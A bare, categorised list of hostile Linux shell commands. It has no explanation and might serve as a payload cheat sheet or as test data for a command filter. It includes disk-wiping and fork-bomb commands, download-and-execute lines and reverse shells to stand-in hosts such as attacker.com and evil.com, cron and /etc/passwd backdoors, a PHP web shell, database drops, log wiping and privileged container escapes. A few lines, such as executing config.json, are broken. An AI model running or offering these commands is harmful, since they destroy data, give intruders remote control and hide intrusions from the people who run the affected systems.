# ===== SYSTEM DESTRUCTION =====
rm -rf /
rm -rf /*
rm -rf / --no-preserve-root
dd if=/dev/zero of=/dev/sda
mkfs.ext4 /dev/sda
:(){ :|:& };:
mv / /dev/null
chmod -R 777 /
echo 1 > /proc/sys/kernel/panic

# ===== PRIVILEGE ESCALATION =====
sudo su
sudo -i
sudo bash
sudo passwd root
su
/bin/bash -i
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'

# ===== MALICIOUS DOWNLOADS =====
wget http://malicious.site/script.sh -O- | sh
curl http://hacker.com/backdoor | bash
ftpget -u hacker -p 1234 192.168.1.1 /tmp/backdoor ./backdoor
nc -e /bin/sh attacker.com 4444
python3 -c 'import urllib.request; urllib.request.urlretrieve("http://evil.com/script.py", "/tmp/script.py")'

# ===== REVERSE SHELLS =====
bash -i >& /dev/tcp/attacker.com/8080 0>&1
nc attacker.com 4444 -e /bin/bash
php -r '$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# ===== KERNEL EXPLOITS =====
insmod malicious.ko
echo 1 > /proc/sys/vm/overcommit_memory
sysctl -w kernel.panic=1
modprobe -r ext4

# ===== CRON/CONTAB EXPLOITS =====
echo "* * * * * root nc -e /bin/sh attacker.com 4444" >> /etc/crontab
crontab -l | { cat; echo "* * * * * /tmp/backdoor"; } | crontab -
at now + 1 minute <<< "/tmp/exploit"

# ===== SSH BACKDOORS =====
echo "hacker:$(openssl passwd -1 password):0:0::/:/bin/sh" >> /etc/passwd
sed -i 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config
service ssh restart
ssh-keygen -t rsa -N "" -f /root/.ssh/authorized_keys

# ===== DATABASE DESTRUCTION =====
mysql -e "DROP DATABASE production;"
psql -c "DROP TABLE users;"
mongo --eval "db.dropDatabase()"
redis-cli FLUSHALL

# ===== NETWORK ATTACKS =====
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
nmap -sS -p 1-65535 -T4 target.com
tcpdump -i eth0 -w /tmp/passwords.pcap
arpspoof -i eth0 -t 192.168.1.1 192.168.1.254

# ===== FILE SYSTEM TAMPERING =====
chattr -i /etc/passwd
chattr -i /etc/shadow
mv /etc/passwd /etc/passwd.bak
ln -sf /bin/bash /tmp/su
find / -type f -exec shred {} \;

# ===== CRYPTO MINERS =====
curl -s http://xmr.pool.com/miner.sh | bash -s 49A2...
wget -q -O- https://raw.githubusercontent.com/xmrig/xmrig/master/scripts/install.sh | bash
./config.json --donate-level=1 --max-cpu-usage=100

# ===== LOG TAMPERING =====
echo "" > /var/log/auth.log
shred -zu /var/log/secure
ln -sf /dev/null /var/log/messages

# ===== CONTAINER ESCAPE =====
docker run -v /:/host -it --privileged ubuntu bash
docker exec -it --privileged $(docker ps -q) bash
kubectl run --generator=run-pod/v1 -it --rm --image=ubuntu --restart=Never --privileged bash

# ===== WEB SHELLS =====
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/backdoor.php
echo 'exec("/bin/bash -c \'bash -i >& /dev/tcp/attacker.com/4444 0>&1\'")' >> config.rb

# ===== MISCELLANEOUS =====
kill -9 -1
pkill -9 -f
strace -f -p 1
gdb -p 1
umount -a
reboot
halt -f
